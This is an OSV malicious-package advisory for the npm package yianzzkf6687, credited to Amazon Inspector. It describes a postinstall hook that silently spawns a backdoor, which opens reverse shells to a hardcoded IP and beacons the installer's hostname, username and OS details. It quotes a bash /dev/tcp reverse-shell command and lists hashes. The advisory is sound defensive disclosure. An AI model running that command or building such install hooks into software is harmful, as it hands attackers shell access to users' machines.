MAL-2026-6235

See a problem?

Import Source

https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/yianzzkf6687/MAL-2026-6235.json

JSON Data

https://api.osv.dev/v1/vulns/MAL-2026-6235

Published

2026-06-20T03:50:25Z

Modified

2026-06-20T05:16:46.206870145Z

Summary

Malicious code in yianzzkf6687 (npm)

Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (a59a0aee58573b3030b9d541980fa9d7df8ea55d4e6cc5b3bb349452b908d0e9)

On npm install, the postinstall hook (scripts/postinstall.js) detach-spawns scripts/shell.js with detached: true, stdio: 'ignore', windowsHide: true and unref()s it, so the malicious process persists silently after npm install returns. scripts/shell.js hardcodes HOST = '114.67.90.67' and opens reverse shells to that IP across multiple fallback ports (3334, 4444, 443, 80, 8080, 53) using Node net, bash -c "bash -i >& /dev/tcp/<HOST>/<port> 0>&1", and a Python fallback, then uses setInterval to keep the process alive. It also sends an HTTP GET to http://114.67.90.67:8333/ping with the installer's hostname, username, cwd, and OS platform/release as query parameters, confirming victim acquisition. The package advertises itself as a string-manipulation utility, providing cover for the backdoor. Installing this package gives the operator of 114.67.90.67 interactive shell access on the installer's machine.

Database specific

{
    "malicious-packages-origins": [
        {
            "sha256": "a59a0aee58573b3030b9d541980fa9d7df8ea55d4e6cc5b3bb349452b908d0e9",
            "source": "amazon-inspector",
            "modified_time": "2026-06-20T03:50:25Z",
            "versions": [
                "1.0.3"
            ],
            "id": "IN-MAL-2026-007092",
            "import_time": "2026-06-20T04:58:37.570611768Z"
        }
    ]
}

References

https://www.npmjs.com/package/yianzzkf6687/v/1.0.3

Credits

- Amazon Inspector - FINDER
- - inspector-research@amazon.com

Affected packages

npm / yianzzkf6687

Package

Name: yianzzkf6687; View open source insights on deps.dev
Purl: pkg:npm/yianzzkf6687

Affected ranges

Affected versions

1.*

1.0.3

Database specific

cwes

[
    {
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature.",
        "cweId": "CWE-506"
    }
]

source

"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/yianzzkf6687/MAL-2026-6235.json"

indicators

{
    "evidence_files": [
        {
            "sha256": "9a9278d74630388e996735bb2e778f572010a2952c9304495f41cbd43adbecee",
            "tlsh": "7081a5b445ba442d3377975f820b103163aba1072d1ae6a836bc53436fd2dbc5863af4",
            "path": "scripts/shell.js"
        },
        {
            "sha256": "20d2859a52b6f2bf12083b85a9332ef9c4be9dbdceab735e0789c7f15bb5a5c7",
            "tlsh": "b8e0eb2ab3a2023cb1bac7c0bb5a33372a0b9700a3901020c9ae1067078739e81330e7",
            "path": "scripts/postinstall.js"
        }
    ],
    "package_integrity": [
        {
            "hashes": {
                "sha512_sri": "sha512-BPpQ4y4/2cqgA6To94RtsJYv4GoLB4803eKmDGgQUTTvSO38CAaFprcCOmY0A9y5jTMUzqEiarNGay1hYyyf0g==",
                "sha1": "46b01418bc3dd1e15c4e2d40f4137973e0809ab1"
            },
            "filename": "yianzzkf6687-1.0.3.tgz"
        }
    ]
}